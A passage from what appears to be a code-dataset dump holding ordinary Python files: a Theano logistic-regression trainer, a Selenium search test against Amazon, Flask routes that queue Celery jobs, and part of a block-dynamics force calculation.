[0,1,2,... n-1]\r\n # T.log(self.p_y_given_x) is a matrix of\r\n # Log-Probabilities (call it LP) with one row per example and\r\n # one column per class LP[T.arange(y.shape[0]),y] is a vector\r\n # v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ...,\r\n # LP[n-1,y[n-1]]]\r\n # T.mean(LP[T.arange(y.shape[0]),y]) is\r\n # the mean (across minibatch examples) of the elements in v,\r\n # i.e., the mean log-likelihood across the minibatch.\r\n return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\r\n # end-snippet-2\r\n\r\n def errors(self, y):\r\n \"\"\"Return a float representing the number of errors in the minibatch\r\n over the total number of examples of the minibatch ; zero one\r\n loss over the size of the minibatch\r\n\r\n :type y: theano.tensor.TensorType\r\n :param y: corresponds to a vector that gives for each example the\r\n correct label\r\n \"\"\"\r\n\r\n # check if y has same dimension of y_pred\r\n if y.ndim != self.y_pred.ndim:\r\n raise TypeError(\r\n 'y should have the same shape as self.y_pred',\r\n ('y', y.type, 'y_pred', self.y_pred.type)\r\n )\r\n # check if y is of the correct datatype\r\n if y.dtype.startswith('int'):\r\n # the T.neq operator returns a vector of 0s and 1s, where 1\r\n # represents a mistake in prediction\r\n return T.mean(T.neq(self.y_pred, y))\r\n else:\r\n raise NotImplementedError()\r\n\r\n\r\ndef load_data(dataset, test_set, num_features):\r\n ''' Loads the dataset\r\n\r\n :type dataset: string\r\n :param dataset: the path to the dataset (here OPCC)\r\n '''\r\n\r\n #############\r\n # LOAD DATA #\r\n #############\r\n\r\n # Load the dataset\r\n # First column has ID numbers and can be excluded from the computation\r\n # Last column has the labels.\r\n data_file = numpy.genfromtxt(dataset, skip_header=1, delimiter=',', usecols = range(1, 95))\r\n test_data = numpy.genfromtxt(test_set, skip_header=1, delimiter=',', usecols = range(1, 95))\r\n \r\n train_target=data_file[0:34650, 93]\r\n test_target=test_data[:, 93]\r\n valid_target=data_file[34650:, 93]\r\n\r\n # Set index to second column\r\n train_target -= 1\r\n test_target -= 1\r\n valid_target -= 1\r\n\r\n data_file = load_information_gain_model(data_file, num_features)\r\n test_data = load_information_gain_model(test_data, num_features)\r\n\r\n #data_file = load_variance_model(data_file, num_features)\r\n #test_data = load_variance_model(test_data, num_features)\r\n\r\n #data_file = load_correlation_model(data_file, num_features)\r\n #test_data = load_correlation_model(test_data, num_features)\r\n \r\n train_set = (data_file[0:34650, 0:num_features], train_target)\r\n test_set = (test_data[:, 0:num_features], test_target)\r\n valid_set = (data_file[34650:, 0:num_features], valid_target)\r\n \r\n # train_set, valid_set, test_set format: tuple(input, target)\r\n # input is a numpy.ndarray of 2 dimensions (a matrix)\r\n # where each row corresponds to an example. target is a\r\n # numpy.ndarray of 1 dimension (vector) that has the same length as\r\n # the number of rows in the input. It should give the target\r\n # to the example with the same index in the input.\r\n\r\n def shared_dataset(data_xy, borrow=True):\r\n \"\"\" Function that loads the dataset into shared variables\r\n\r\n The reason we store our dataset in shared variables is to allow\r\n Theano to copy it into the GPU memory (when code is run on GPU).\r\n Since copying data into the GPU is slow, copying a minibatch everytime\r\n is needed (the default behaviour if the data is not in a shared\r\n variable) would lead to a large decrease in performance.\r\n \"\"\"\r\n data_x, data_y = data_xy\r\n shared_x = theano.shared(numpy.asarray(data_x,\r\n dtype=theano.config.floatX),\r\n borrow=borrow)\r\n shared_y = theano.shared(numpy.asarray(data_y,\r\n dtype=theano.config.floatX),\r\n borrow=borrow)\r\n # When storing data on the GPU it has to be stored as floats\r\n # therefore we will store the labels as ``floatX`` as well\r\n # (``shared_y`` does exactly that). But during our computations\r\n # we need them as ints (we use labels as index, and if they are\r\n # floats it doesn't make sense) therefore instead of returning\r\n # ``shared_y`` we will have to cast it to int. This little hack\r\n # lets ous get around this issue\r\n return shared_x, T.cast(shared_y, 'int32')\r\n\r\n test_set_x, test_set_y = shared_dataset(test_set)\r\n valid_set_x, valid_set_y = shared_dataset(valid_set)\r\n train_set_x, train_set_y = shared_dataset(train_set)\r\n\r\n rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),\r\n (test_set_x, test_set_y)]\r\n return rval\r\n\r\ndef load_data_pca(dataset, test_set, pca_set, pca_test, num_features):\r\n ''' Loads the dataset\r\n\r\n :type dataset: string\r\n :param dataset: the path to the dataset (here OPCC)\r\n '''\r\n\r\n #############\r\n # LOAD DATA #\r\n #############\r\n\r\n # Load the dataset\r\n # First column has ID numbers and can be excluded from the computation\r\n # Last column has the labels.\r\n data_file = numpy.genfromtxt(dataset, skip_header=1, delimiter=',', usecols = range(1, 95))\r\n test_data = numpy.genfromtxt(test_set, skip_header=1, delimiter=',', usecols = range(1, 95))\r\n \r\n train_target=data_file[0:34650, 93]\r\n test_target=test_data[:, 93]\r\n valid_target=data_file[34650:, 93]\r\n\r\n # Set index to first column\r\n train_target -= 1\r\n test_target -= 1\r\n valid_target -= 1\r\n\r\n data_file = numpy.genfromtxt(pca_set, delimiter=',')\r\n test_data = numpy.genfromtxt(pca_test, delimiter=',')\r\n \r\n train_set = (data_file[0:34650, 0:num_features], train_target)\r\n test_set = (test_data[:, 0:num_features], test_target)\r\n valid_set = (data_file[34650:, 0:num_features], valid_target)\r\n \r\n # train_set, valid_set, test_set format: tuple(input, target)\r\n # input is a numpy.ndarray of 2 dimensions (a matrix)\r\n # where each row corresponds to an example. target is a\r\n # numpy.ndarray of 1 dimension (vector) that has the same length as\r\n # the number of rows in the input. It should give the target\r\n # to the example with the same index in the input.\r\n\r\n def shared_dataset(data_xy, borrow=True):\r\n \"\"\" Function that loads the dataset into shared variables\r\n\r\n The reason we store our dataset in shared variables is to allow\r\n Theano to copy it into the GPU memory (when code is run on GPU).\r\n Since copying data into the GPU is slow, copying a minibatch everytime\r\n is needed (the default behaviour if the data is not in a shared\r\n variable) would lead to a large decrease in performance.\r\n \"\"\"\r\n data_x, data_y = data_xy\r\n shared_x = theano.shared(numpy.asarray(data_x,\r\n dtype=theano.config.floatX),\r\n borrow=borrow)\r\n shared_y = theano.shared(numpy.asarray(data_y,\r\n dtype=theano.config.floatX),\r\n borrow=borrow)\r\n # When storing data on the GPU it has to be stored as floats\r\n # therefore we will store the labels as ``floatX`` as well\r\n # (``shared_y`` does exactly that). But during our computations\r\n # we need them as ints (we use labels as index, and if they are\r\n # floats it doesn't make sense) therefore instead of returning\r\n # ``shared_y`` we will have to cast it to int. This little hack\r\n # lets ous get around this issue\r\n return shared_x, T.cast(shared_y, 'int32')\r\n\r\n test_set_x, test_set_y = shared_dataset(test_set)\r\n valid_set_x, valid_set_y = shared_dataset(valid_set)\r\n train_set_x, train_set_y = shared_dataset(train_set)\r\n\r\n rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),\r\n (test_set_x, test_set_y)]\r\n return rval\r\n\r\ndef load_information_gain_model(dataset, num_vars):\r\n \"\"\" Function that loads the columns based on order from highest to lowest information gain and the number of required columns.\r\n\r\n :type dataset: numPy array (dtype=float)\r\n :param dataset: a matrix of N rows and 93 columns\r\n\r\n :type num_vars: int\r\n :param num_vars: Number of features (columns) to select from the dataset.\r\n\r\n \"\"\"\r\n information_gain_indices = numpy.array([10, 33, 25, 39, 59, 13, 14, 24, 85, 66, 41, 23, 35, 87, 68, 47, 61,\r\n 3, 2, 63, 74, 7, 75, 67, 71, 89, 42, 31, 52, 8, 38, 15, 56, 26,\r\n 32, 84, 69, 29, 53, 58, 16, 19, 34, 49, 70, 37, 79, 0, 77, 40, 91,\r\n 1, 86, 55, 72, 46, 65, 21, 82, 17, 90, 36, 78, 57, 12, 43, 54, 73,\r\n 28, 88, 81, 18, 9, 20, 44, 64, 22, 62, 76, 51, 45, 6, 48, 11, 60,\r\n 92, 30, 4, 27, 80, 50, 5, 83], dtype=numpy.int64)\r\n \r\n information_gain_indices = information_gain_indices[num_vars:]\r\n print(information_gain_indices.shape[0])\r\n\r\n dataset = numpy.delete(dataset, information_gain_indices, 1)\r\n\r\n #pdb.set_trace() \r\n return dataset\r\n\r\ndef load_variance_model(dataset, num_vars):\r\n \"\"\" Function that loads the columns based on order from highest to lowest variance and the number of required columns.\r\n\r\n :type dataset: numPy array (dtype=float)\r\n :param dataset: a matrix of N rows and 93 columns\r\n\r\n :type num_vars: int\r\n :param num_vars: Number of features (columns) to select from the dataset.\r\n\r\n \"\"\"\r\n\r\n variance_indices = numpy.array([72, 66, 18, 89, 23, 57, 68, 53, 14, 73, 8, 63, 33, 39, 34, 38, 74,\r\n 13, 10, 59, 2, 26, 75, 3, 77, 85, 61, 58, 47, 35, 44, 71, 82, 45,\r\n 24, 31, 79, 15, 7, 87, 90, 12, 55, 41, 69, 52, 84, 28, 49, 67, 25,\r\n 42, 29, 88, 86, 37, 16, 0, 21, 19, 46, 48, 43, 65, 17, 32, 78, 92,\r\n 1, 83, 70, 40, 9, 56, 51, 60, 6, 54, 91, 62, 76, 30, 81, 27, 64,\r\n 36, 22, 20, 11, 50, 4, 80, 5], dtype=numpy.int64)\r\n variance_indices = variance_indices[num_vars:]\r\n print(variance_indices.shape[0])\r\n\r\n\r\n dataset = numpy.delete(dataset, variance_indices, 1)\r\n #pdb.set_trace() \r\n return dataset\r\n\r\ndef load_correlation_model(dataset, num_vars):\r\n \"\"\" Function that loads the columns based on order from highest to lowest correlation and the number of required columns.\r\n\r\n :type dataset: numPy array (dtype=float)\r\n :param dataset: a matrix of N rows and 93 columns\r\n\r\n :type num_vars: int\r\n :param num_vars: Number of features (columns) to select from the dataset.\r\n\r\n \"\"\"\r\n correlation_indices = numpy.array([13, 39, 24, 14, 87, 23, 35, 19, 68, 71, 7, 74, 21, 37, 40, 75, 1,\r\n 17, 89, 66, 12, 10, 61, 67, 65, 32, 53, 8, 57, 82, 78, 54, 56, 58,\r\n 3, 59, 79, 2, 34, 90, 91, 25, 6, 46, 27, 63, 48, 43, 70, 36, 18,\r\n 16, 41, 28, 42, 81, 45, 52, 60, 85, 88, 22, 30, 77, 26, 84, 86, 9,\r\n 38, 80, 49, 47, 11, 51, 72, 0, 62, 73, 44, 64, 50, 76, 92, 5, 4,\r\n 69, 55, 29, 33, 31, 20, 15, 83], dtype=numpy.int64)\r\n correlation_indices = correlation_indices[num_vars:]\r\n print(correlation_indices.shape[0])\r\n\r\n\r\n dataset = numpy.delete(dataset, correlation_indices, 1)\r\n #pdb.set_trace() \r\n return dataset\r\n\r\ndef sgd_optimization_opcc(learning_rate=0.05, n_epochs=1000,\r\n dataset='OPCCTrain.csv',\r\n test_set = 'OPCCTest.csv',\r\n batch_size=600):\r\n \"\"\"\r\n Demonstrate stochastic gradient descent optimization of a log-linear\r\n model\r\n\r\n This is demonstrated on the OPCC dataset.\r\n\r\n :type learning_rate: float\r\n :param learning_rate: learning rate used (factor for the stochastic\r\n gradient)\r\n\r\n :type n_epochs: int\r\n :param n_epochs: maximal number of epochs to run the optimizer\r\n\r\n :type dataset: string\r\n :param dataset: the csv filename\r\n\r\n \"\"\"\r\n #datasets = load_data(dataset, test_set, 68)\r\n #datasets = load_data(dataset, test_set, 86)\r\n #datasets = load_data(dataset, test_set, 92)\r\n #datasets = load_data(dataset, test_set, 93)\r\n\r\n #PCA\r\n #datasets = load_data_pca(dataset, test_set, 'xTrain_PCA_68.csv', 'xTest_PCA_68.csv', 68)\r\n #datasets = load_data_pca(dataset, test_set, 'xTrain_PCA_86.csv', 'xTest_PCA_86.csv', 86)\r\n datasets = load_data_pca(dataset, test_set, 'xTrain_PCA_92.csv', 'xTest_PCA_92.csv', 92)\r\n\r\n train_set_x, train_set_y = datasets[0]\r\n valid_set_x, valid_set_y = datasets[1]\r\n test_set_x, test_set_y = datasets[2]\r\n\r\n #Calculate D - dimension\r\n num_features = train_set_x.shape[1].eval()\r\n\r\n # compute number of minibatches for training, validation and testing\r\n n_train_batches = train_set_x.get_value(borrow=True).shape[0] // batch_size\r\n n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] // batch_size\r\n n_test_batches = test_set_x.get_value(borrow=True).shape[0] // batch_size\r\n\r\n ######################\r\n # BUILD ACTUAL MODEL #\r\n ######################\r\n print('... building the model')\r\n\r\n # allocate symbolic variables for the data\r\n index = T.lscalar() # index to a [mini]batch\r\n\r\n # generate symbolic variables for input (x and y represent a\r\n # minibatch)\r\n x = T.matrix('x') # data, presented as rasterized images\r\n y = T.ivector('y') # labels, presented as 1D vector of [int] labels\r\n\r\n # Each OPCC product has size 93 features\r\n classifier = LogisticRegression(input=x, n_in=num_features, n_out=9)\r\n\r\n # the cost we minimize during training is the negative log likelihood of\r\n # the model in symbolic format\r\n cost = classifier.negative_log_likelihood(y)\r\n\r\n # compiling a Theano function that computes the mistakes that are made by\r\n # the model on a minibatch\r\n test_model = theano.function(\r\n inputs=[index],\r\n outputs=classifier.errors(y),\r\n givens={\r\n x: test_set_x[index * batch_size: (index + 1) * batch_size],\r\n y: test_set_y[index * batch_size: (index + 1) * batch_size]\r\n }\r\n )\r\n\r\n validate_model = theano.function(\r\n inputs=[index],\r\n outputs=classifier.errors(y),\r\n givens={\r\n x: valid_set_x[index * batch_size: (index + 1) * batch_size],\r\n y: valid_set_y[index * batch_size: (index + 1) * batch_size]\r\n }\r\n )\r\n\r\n # compute the gradient of cost with respect to theta = (W,b)\r\n g_W = T.grad(cost=cost, wrt=classifier.W)\r\n g_b = T.grad(cost=cost, wrt=classifier.b)\r\n\r\n # specify how to update the parameters of the model as a list of\r\n # (variable, update expression) pairs.\r\n updates = [(classifier.W, classifier.W - learning_rate * g_W),\r\n (classifier.b, classifier.b - learning_rate * g_b)]\r\n\r\n # compiling a Theano function `train_model` that returns the cost, but in\r\n # the same time updates the parameter of the model based on the rules\r\n # defined in `updates`\r\n train_model = theano.function(\r\n inputs=[index],\r\n outputs=cost,\r\n updates=updates,\r\n givens={\r\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\r\n y: train_set_y[index * batch_size: (index + 1) * batch_size]\r\n }\r\n )\r\n\r\n ###############\r\n # TRAIN MODEL #\r\n ###############\r\n print('... training the model')\r\n # early-stopping parameters\r\n patience = 5000 # look as this many examples regardless\r\n patience_increase = 3 # wait this much longer when a new best is\r\n # found\r\n improvement_threshold = 0.995 # a relative improvement of this much is\r\n # considered significant\r\n validation_frequency = min(n_train_batches, patience // 2)\r\n # go through this many\r\n # minibatche before checking the network\r\n # on the validation set; in this case we\r\n # check every epoch\r\n\r\n best_validation_loss = numpy.inf\r\n test_score = 0.\r\n start_time = timeit.default_timer()\r\n\r\n done_looping = False\r\n epoch = 0\r\n while (epoch < n_epochs) and (not done_looping):\r\n epoch = epoch + 1\r\n for minibatch_index in range(n_train_batches):\r\n\r\n minibatch_avg_cost = train_model(minibatch_index)\r\n # iteration number\r\n iter = (epoch - 1) * n_train_batches + minibatch_index\r\n\r\n if (iter + 1) % validation_frequency == 0:\r\n # compute zero-one loss on validation set\r\n validation_losses = [validate_model(i)\r\n for i in range(n_valid_batches)]\r\n this_validation_loss = numpy.mean(validation_losses)\r\n\r\n print(\r\n 'epoch %i, minibatch %i/%i, validation error %f %%' %\r\n (\r\n epoch,\r\n minibatch_index + 1,\r\n n_train_batches,\r\n this_validation_loss * 100.\r\n )\r\n )\r\n\r\n # if we got the best validation score until now\r\n if this_validation_loss < best_validation_loss:\r\n #improve patience if loss improvement is good enough\r\n if this_validation_loss < best_validation_loss * \\\r\n improvement_threshold:\r\n patience = max(patience, iter * patience_increase)\r\n\r\n best_validation_loss = this_validation_loss\r\n # test it on the test set\r\n\r\n test_losses = [test_model(i)\r\n for i in range(n_test_batches)]\r\n test_score = numpy.mean(test_losses)\r\n\r\n print(\r\n (\r\n ' epoch %i, minibatch %i/%i, test error of'\r\n ' best model %f %%'\r\n ) %\r\n (\r\n epoch,\r\n minibatch_index + 1,\r\n n_train_batches,\r\n test_score * 100.\r\n )\r\n )\r\n\r\n # save the best model\r\n with open('best_model.pkl', 'wb') as f:\r\n pickle.dump(classifier, f)\r\n\r\n if patience <= iter:\r\n done_looping = True\r\n break\r\n\r\n end_time = timeit.default_timer()\r\n print(\r\n (\r\n 'Optimization complete with best validation score of %f %%,'\r\n 'with test performance %f %%'\r\n )\r\n % (best_validation_loss * 100., test_score * 100.)\r\n )\r\n print('The code run for %d epochs, with %f epochs/sec' % (\r\n epoch, 1. * epoch / (end_time - start_time)))\r\n print(('The code for file ' +\r\n os.path.split(__file__)[1] +\r\n ' ran for %.1fs' % ((end_time - start_time))), file=sys.stderr)\r\n\r\n\r\ndef predict():\r\n \"\"\"\r\n An example of how to load a trained model and use it\r\n to predict labels.\r\n \"\"\"\r\n\r\n # load the saved model\r\n classifier = pickle.load(open('best_model.pkl', 'rb'))\r\n\r\n # compile a predictor function\r\n predict_model = theano.function(\r\n inputs=[classifier.input],\r\n outputs=classifier.y_pred)\r\n\r\n # We can test it on some examples from test test\r\n dataset='OPCCTrain.csv'\r\n test_set='OPCCTest.csv'\r\n #datasets = load_data(dataset, test_set, 68)\r\n datasets = load_data(dataset, test_set, 86)\r\n #datasets = load_data(dataset, test_set, 92)\r\n #datasets = load_data(dataset, test_set, 93)\r\n\r\n test_set_x, test_set_y = datasets[2]\r\n test_set_x = test_set_x.get_value()\r\n test_set_y = test_set_y.eval()\r\n\r\n print(test_set_y[:10])\r\n predicted_values = predict_model(test_set_x)\r\n print(\"Predicted values for the first 10 examples in test set:\")\r\n print(predicted_values[:10])\r\n\r\n errors = 0\r\n for i in range(len(test_set_y)):\r\n if predicted_values[i] != test_set_y[i]:\r\n errors = errors+1\r\n\r\n error_rate = (errors / len(test_set_y)) * 100\r\n print(error_rate)\r\n\r\n #print(predicted_values)\r\n\r\n\r\nif __name__ == '__main__':\r\n sgd_optimization_opcc()\r\n #predict()\r\n","sub_path":"Neural Net/logistic_sgd.py","file_name":"logistic_sgd.py","file_ext":"py","file_size_in_byte":24091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"636525131","text":"# Python code to demonstrate working of unittest\r\nimport unittest\r\n# import _json\r\nfrom selenium import webdriver\r\ndriver = webdriver.Chrome()\r\ndriver.implicitly_wait(10)\r\n\r\nclass web_page:\r\n def __init__(self, baseurl, search_area, submit_button):\r\n self.baseurl = baseurl\r\n self.search_area = search_area\r\n self.submit_button = submit_button\r\n\r\nclass search_element:\r\n def __init__(self, keyword, location, path, path_new):\r\n self.keyword = keyword\r\n self.location = location\r\n self.path = path\r\n self.path_new = path_new\r\n\r\n#define my instance\r\nsearch_element = search_element(\"LEGO\", 'window.scrollTo(0, 964.8)', '//*[@id=\"search\"]/div[1]/div[2]//span[4]/div[1]/div[3]//span//div[2]/div[2]//div[1]//div[1]/h2/a/span', '//*[@id=\"productTitle\"]')\r\nweb_page = web_page('https://amazon.com', 'twotabsearchtextbox', '//*[@id=\"nav-search\"]/form/div[2]/div/input')\r\n\r\n\r\nclass TestSearchFunctionality(unittest.TestCase):\r\n def setUp(self) -> None:\r\n # define search area and submit button\r\n driver.get(web_page.baseurl)\r\n driver.maximize_window()\r\n self.search_area = driver.find_element_by_id(web_page.search_area)\r\n self.submit_button = driver.find_elements_by_xpath(web_page.submit_button)[0]\r\n # type text\r\n self.search_area.send_keys(search_element.keyword)\r\n # search the text\r\n self.submit_button.click()\r\n #scroll the window to desired location\r\n driver.execute_script(search_element.location)\r\n #open the searched item\r\n self.search_results = driver.find_elements_by_xpath(search_element.path)[0]\r\n self.search_results.click()\r\n #locate the item\r\n self.new_window = driver.find_elements_by_xpath(search_element.path_new)[0]\r\n def tearDown(self) -> None:\r\n driver.quit()\r\n def test_run(self):\r\n self.assertEqual(str(self.search_results), str(self.new_window))\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"Homework6.py","file_name":"Homework6.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"104101878","text":"from flask import request\nfrom flask.json import jsonify\nfrom flask_restful import Resource\nfrom flask_pydantic import validate\n\nfrom messenger.schema.job import RunSuiteBase, RunTemplateBase\nfrom messenger.utils.response_util import RET\nfrom celeryservice.tasks import run_suite, run_template\n\n\nclass RunSuiteEvent(Resource):\n @validate()\n def post(self, body: RunSuiteBase):\n _body = body.__dict__\n _user_id = _body.pop(\"user_id\")\n\n _user = {\n \"user_id\": _user_id,\n \"auth\": request.headers.get(\"authorization\"),\n }\n\n run_suite.delay(_body, _user)\n\n return jsonify(\n error_code=RET.OK, \n error_msg=\"succeed in creating the job for running suite\"\n )\n\n\nclass RunTemplateEvent(Resource):\n @validate()\n def post(self, body: RunTemplateBase):\n _body = body.__dict__\n _user_id = _body.pop(\"user_id\")\n _user = {\n \"user_id\": _user_id,\n \"auth\": request.headers.get(\"authorization\"),\n }\n run_template.delay(_body, _user)\n\n return jsonify(\n error_code=RET.OK, \n error_msg=\"succeed in creating the job for running template\"\n )\n","sub_path":"radiaTest-messenger/messenger/apps/job/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51228569","text":"VERSION_NAME = 'SAPCOR_v04h'\n\n# MODULE NAME\nMODULE_NAME_THIS__FORCE_BLOCK_V_F = VERSION_NAME+'_Force_Block_V_F'\n\n###############################################################################\n#{ SYSTEM INITIALIZATION\n\nimport glob\n\n# -------------------------------------------------------------------\n# MODULE NAMES TO BE IMPORTED\nMODULE_NAMES_FORCE_BLOCK_V_F = []\nMODULE_NAMES_FORCE_BLOCK_V_F.append('Misc')\nMODULE_NAMES_FORCE_BLOCK_V_F.append('Input')\n# -------------------------------------------------------------------\n\n# -------------------------------------------------------------------\n# Import Modules\nfor Module_Name in MODULE_NAMES_FORCE_BLOCK_V_F:\n FileName = VERSION_NAME+'_'+Module_Name+'_Build*.py'\n FList = glob.glob(FileName)\n assert len(FList)!=0,'ERROR: Module not found : '+FileName\n FList.sort()\n FileName = FList[-1][0:-3]\n exec('from '+FileName+' import *')\n# -------------------------------------------------------------------\n\n\nfrom numpy import loadtxt\nfrom numpy import array,zeros,hstack\n\n#}#############################################################################\n\n\n#-------------------------------------------------------------------------\ndef Force_Block_V_F (w,t,Core,K,L,Accel,POST=False,FO_DIR=FO_DIR):\n#{\n #{ DESCRIPTION \n \"\"\"\n Defines the differential equations for the coupled spring-mass system.\n\n Arguments:\n w : vector of the state variables at time, t:\n w = [U,DU,W,DW,R,DR,...]\n t : time\n Core : Var space\n \"\"\"\n #}\n\n #{ VERBOSE\n if '/Force/' in VERBOSE:\n Verbose('')\n Verbose('time=%e, (K,L)=(%d,%d)'%(t,K,L))\n #} \n\n#=========================================================================\n#{ INITIALIZATION\n \n # Column Size\n N = Core['N'][K]\n\n #{ Get Block Prop of (K,L)\n# BN = Core['Array'][K][L]\n BN = Core['BTNsKL'][K][L]\n BT = BlockTypes[BN]\n A = BT['a']\n H = BT['h']\n M = BT['M']\n I = BT['I']\n Kv = BT['Kv']\n Cv = BT['Cv']\n mu_s = BT['mu_s']\n mu_k = BT['mu_k']\n d_mu = BT['d_mu']\n xi_F_cr = BT['xi_F_cr']\n# Fixed = BT['Fixed']\n #}\n\n #{ Get Block Prop of (K,L-1)\n # Subscript, m, means 'Minus 1'\n if L!=1:\n #{\n# BN = Core['Array'][K][L-1]\n BN = Core['BTNsKL'][K][L-1]\n BT = BlockTypes[BN]\n# Am = BT['a']\n Hm = BT['h']\n Mm = BT['M']\n Im = BT['I']\n# Kvm = BT['Kv']\n# Cvm = BT['Cv']\n# Fixedm = BT['Fixed']\n #}\n else:\n #{\n if Core['Flag_CSB']==True: # CSB\n BT = BlockTypes['CSB']\n Hm = 0\n Mm = BT['M']\n Im = BT['I']\n else: # Base\n Hm = 0\n Mm = Im = 1\n #} \n #}\n\n # Get current state of (K,L)\n U,DU,W,DW,R,DR = GetSolFromVect(Core,w,K,L) # U,DU,W,DW,R,DR\n\n #{ Get current state of (K,L-1)\n # If L==1:\n # It means lower component is CSB or Base.\n # If Flag_CSB==True: Get state of CSB (which means (K,L)==(1,0))\n # Else : Get state of Base (which means (K,L)==(0,0))\n if L!=1:\n Um,DUm,Wm,DWm,Rm,DRm = GetSolFromVect(Core,w,K,L-1) # U,DU,W,DW,R,DR\n else:\n \t#{\n if Core['Flag_CSB']==True:\n Um,DUm,Wm,DWm,Rm,DRm = GetSolFromVect(Core,w,1,0) # CSB\n else:\n Um,DUm,Wm,DWm,Rm,DRm = GetSolFromVect(Core,w,0,0) # Base\n #}\n #} \n \n# INITIALIZATION\n#}========================================================================\n\n##############################################################################\n#{ VERTICAL FORCES #\n# #\n# #\n\n#(v04f) if Core['ApplyForces']['Block_V']==True:\n# ['Block_V'] is already checked in VectorField()\n\n #{ Spring Contraction between (K,L-1)~(K,L)\n if L!=1:\n Gamma_L = Wm - Hm * (1-cos( Rm )) + A * sin( Rm )\n Gamma_L -= W + H * (1-cos( R )) + A * sin( R )\n Gamma_L *= 0.5\n Gamma_R = Wm - Hm * (1-cos( Rm )) - A * sin( Rm )\n Gamma_R -= W + H * (1-cos( R )) - A * sin( R )\n Gamma_R *= 0.5\n\n DGamma_L = DWm - ( Hm * sin( Rm ) - A * cos( Rm ) ) * DRm\n DGamma_L -= DW + ( H * sin( R ) + A * cos( R ) ) * DR\n DGamma_L *= 0.5\n DGamma_R = DWm - ( Hm * sin( Rm ) + A * cos( Rm ) ) * DRm\n DGamma_R -= DW + ( H * sin( R ) - A * cos( R ) ) * DR\n DGamma_R *= 0.5\n else: # Interaction between CSB(or Base)~(K,1)\n Gamma_L = Wm\n Gamma_L -= W + H * (1-cos( R )) + A * sin( R )\n Gamma_L *= 0.5\n Gamma_R = Wm\n Gamma_R -= W + H * (1-cos( R )) - A * sin( R )\n Gamma_R *= 0.5\n\n DGamma_L = DWm\n DGamma_L -= DW + ( H * sin( R ) + A * cos( R ) ) * DR\n DGamma_L *= 0.5\n DGamma_R = DWm\n DGamma_R -= DW + ( H * sin( R ) - A * cos( R ) ) * DR\n DGamma_R *= 0.5\n #}\n \n #{ Forces and Moments\n F_VL, F_VR = 0,0\n M_VL, M_VR, M_VLm, M_VRm = 0,0,0,0\n \n if Gamma_L>0.:\n F_VL = Kv * Gamma_L + Cv * DGamma_L\n if Gamma_R>0.:\n F_VR = Kv * Gamma_R + Cv * DGamma_R\n\n #---------------------------\n # ELIMINATE STICKING FORCE\n #---------------------------\n if FLAG_NoStickForce == True:\n#(v04f)\n# if M_VL < 0. : M_VL = 0.\n# if M_VR < 0. : M_VR = 0.\n# if M_VLm > 0. : M_VLm = 0.\n# if M_VRm > 0. : M_VRm = 0.\n if F_VL < 0. : F_VL = 0.\n if F_VR < 0. : F_VR = 0.\n #---------------------------\n\n M_VL = F_VL * ( A*cos(R ) + H *sin(R ) )\n M_VR = -F_VR * ( A*cos(R ) - H *sin(R ) )\n M_VLm = -F_VL * ( A*cos(Rm) - Hm*sin(Rm) )\n M_VRm = F_VR * ( A*cos(Rm) + Hm*sin(Rm) )\n\n #} \n\n #{ Assemble Forces\n AccelF = (F_VL + F_VR ) / M\n AccelM = (M_VL + M_VR ) / I\n AccelFm = -(F_VL + F_VR ) / Mm\n AccelMm = (M_VLm + M_VRm) / Im\n \n # Add Accel on (K,L)\n IndexW = Core['Index'][K][L]*6\n Accel[IndexW+3] += AccelF # DDW\n Accel[IndexW+5] += AccelM # DDR\n \n # Add Accel on (K,L-1)\n if L!=1: # Normal Blocks\n IndexWm = Core['Index'][K][L-1]*6\n Accel[IndexWm+3] += AccelFm # DDW\n Accel[IndexWm+5] += AccelMm # DDR\n \n elif Core['Flag_CSB']==True: # Add Accel on CSB\n pass # if CSB: Do nothing\n\n else: pass # if Base: Do nothing\n \n #}\n\n #{ VERBOSE\n if '/ForceV/' in VERBOSE:\n Verbose('-'*80)\n Verbose('Force_Block_V(), F_V Caculation Verification')\n Verbose('Block (%d,%d)'%(K,L))\n Verbose('U, DU, W, DW, R, DR = %e, %e, %e, %e, %e, %e'%(U,DU,W,DW,R,DR))\n Verbose('Um,DUm,Wm,DWm,Rm,DRm = %e, %e, %e, %e, %e, %e'%(Um,DUm,Wm,DWm,Rm,DRm))\n Verbose('Gamma = %e, %e'%(Gamma_L,Gamma_R))\n Verbose('DGamma = %e, %e'%(DGamma_L,DGamma_R))\n Verbose('FV = %e, %e'%(F_VL,F_VR))\n Verbose('MFV = %e, %e, %e, %e'%(M_VL,M_VR,M_VLm,M_VRm))\n Verbose('Accel(%d,%d) = %e, %e'%(K,L,AccelF,AccelM))\n Verbose('Accel[%d] = %e'%(IndexW+3,Accel[IndexW+3]))\n Verbose('Accel[%d] = %e'%(IndexW+5,Accel[IndexW+5]))\n if L!=1:\n Verbose('Accel(%d,%d) = %e, %e'%(K,L-1,AccelFm,AccelMm))\n Verbose('Accel[%d] = %e'%(IndexWm+3,Accel[IndexWm+3]))\n Verbose('Accel[%d] = %e'%(IndexWm+5,Accel[IndexWm+5]))\n #}\n \n #{ POST\n if POST==True:\n temp = '%e, '%t\n temp += '%e, %e, %e, %e, %e, '%(Gamma_L,DGamma_L,F_VL,M_VL,M_VLm)\n temp += '%e, %e, %e, %e, %e '%(Gamma_R,DGamma_R,F_VR,M_VR,M_VRm)\n temp += '\\n'\n fo = open(FO_DIR+'/(%2d,%2d)_V.csv'%(K,L),'a')\n fo.write(temp)\n fo.close()\n #}\n\n# #\n# #\n# END OF VERTICAL FORCES #\n#}############################################################################\n\n\n##############################################################################\n#{ FRICTION FORCES #\n# #\n# #\n\n#(v04f) if Core['ApplyForces']['Block_F']==True:\n if Core['ApplyForces']['Block_VF']==True:\n #{\n\n #{ Init\n xi_L=xi_R=0\n 